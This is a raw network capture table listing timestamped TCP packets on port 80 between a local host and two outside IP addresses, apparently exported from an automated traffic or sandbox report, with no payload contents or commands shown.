Dec 16, 2024 11:03:10.988157034 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.989048004 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.989162922 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.989228010 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.990219116 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.990274906 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.990283012 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.990322113 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.991251945 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.991396904 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.991555929 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.992398977 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.992458105 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.992623091 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.992687941 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.993535042 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.993609905 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.993659973 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.993715048 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.994580030 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.994683027 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.994720936 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.995089054 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.995711088 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.995784998 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.995862007 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.996790886 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.996860027 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.996905088 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.996956110 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.997900009 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.997972012 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.998035908 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.998146057 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.998986959 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.999047041 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.999103069 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.999737978 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.000122070 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.000214100 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.000293016 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.000674963 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.001198053 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.001323938 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.001380920 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.002334118 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.002430916 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.002490044 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.003427029 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.003536940 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.003599882 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.004519939 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.004643917 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.004697084 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.005625010 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.005754948 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.005822897 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.006726027 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.006808043 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.006835938 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.006855965 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.007843018 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.007898092 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.007966042 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.008019924 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.008963108 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.009022951 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.009088993 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.009144068 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.010072947 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.010132074 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.010173082 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.010230064 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.011157990 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.011231899 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.011282921 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.011343956 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.012264013 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.012393951 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.012454987 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.013340950 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.013472080 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.013526917 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.014467001 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.014605999 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.014662027 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.015662909 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.015717983 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.015774012 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.016688108 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.016817093 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.016875982 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.017908096 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.017962933 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.017966986 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.018007040 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.018889904 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.019016027 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.019069910 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.020020008 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.020137072 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.020191908 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.021127939 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.021241903 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.021298885 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.022207975 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.022267103 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.022330046 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.022416115 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.024271011 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.024307966 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.024385929 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.025233030 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.025298119 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.025356054 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.026134014 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.026804924 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.159986019 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.160029888 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.160093069 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.160136938 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.160391092 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.160458088 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.160525084 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.160579920 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.161597967 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.161653996 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.161772013 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.161828041 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.162643909 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.162703037 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.162767887 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.162821054 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.163738966 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.163799047 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.163866043 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.163921118 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.164859056 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.164913893 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.164993048 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.165047884 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.166146040 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.166202068 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.166281939 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.166335106 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.167094946 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.167131901 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.167155981 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.167191029 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.168174982 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.168234110 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.168314934 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.168370962 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.169266939 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.169322968 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.169967890 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.170032024 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:11.170358896 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:11.170416117 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:13.359112978 CET	49779	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:13.359493971 CET	49796	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:13.479475975 CET	80	49779	185.215.113.43	192.168.2.5
Dec 16, 2024 11:03:13.479521990 CET	80	49796	185.215.113.43	192.168.2.5
Dec 16, 2024 11:03:13.479633093 CET	49779	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:13.479701996 CET	49796	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:13.480089903 CET	49796	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:13.600080013 CET	80	49796	185.215.113.43	192.168.2.5
Dec 16, 2024 11:03:14.833009005 CET	80	49796	185.215.113.43	192.168.2.5
Dec 16, 2024 11:03:14.833168983 CET	49796	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:14.834675074 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:14.834940910 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:14.954777002 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:14.954878092 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:14.954940081 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:14.955118895 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:14.955167055 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:15.074985981 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.278450966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.278500080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.278526068 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.278543949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.278559923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.278577089 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.278589010 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.278598070 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.278604984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.278609037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.278624058 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.278642893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.278646946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.278677940 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.278703928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.398905993 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.398962975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.399055004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.403023005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.403079033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.403095961 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.403129101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.470352888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.470410109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.470488071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.474180937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.474267006 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.474287033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.474348068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.482958078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.483012915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.483040094 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.483064890 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.491367102 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.491425991 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.491563082 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.499505043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.499598980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.499623060 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.499680042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.508121967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.508179903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.508265972 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.516417027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.516474962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.516541004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.524624109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.524694920 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.524799109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.524866104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.533134937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.533241987 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.533241034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.533329964 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.540879011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.540937901 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.540952921 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.540990114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.548527956 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.548624992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.548693895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.556226015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.556308985 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.556323051 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.556386948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.662395954 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.662452936 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.662472010 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.662503958 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.664638042 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.664747953 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.664757013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.664817095 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.669174910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.669239044 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.669436932 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.669528008 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.674169064 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.674242973 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.674263000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.674329042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.678838015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.678910971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.678932905 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.678991079 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.683638096 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.683686018 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.683748007 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.688079119 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.688157082 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.688177109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.688232899 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.692635059 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.692694902 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.692789078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.692852020 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.697264910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.697314024 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.697330952 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.697365046 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.701503992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.701579094 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.701600075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.701656103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.705722094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.705840111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.705854893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.705912113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.710555077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.710612059 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.710621119 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.710663080 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.715028048 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.715085983 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.715095997 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.715153933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.719268084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.719340086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.719424963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.719484091 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.734812975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.734883070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.734898090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.734936953 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.734952927 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.734972954 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.734982014 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.735011101 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.735025883 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.735049963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.735060930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.735099077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.737314939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.737371922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.737376928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.737420082 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.741801977 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.741862059 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.741874933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.741909027 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.746087074 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.746155024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.746217012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.746278048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.750704050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.750766039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.750776052 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.750828028 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.755253077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.755311012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.755325079 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.755409002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.759507895 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.759676933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.759705067 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.759728909 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.783926010 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.783999920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.784003019 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.784054995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.855639935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.855693102 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.855783939 CET	49800	80	192.168.2.5	31.41.244.11
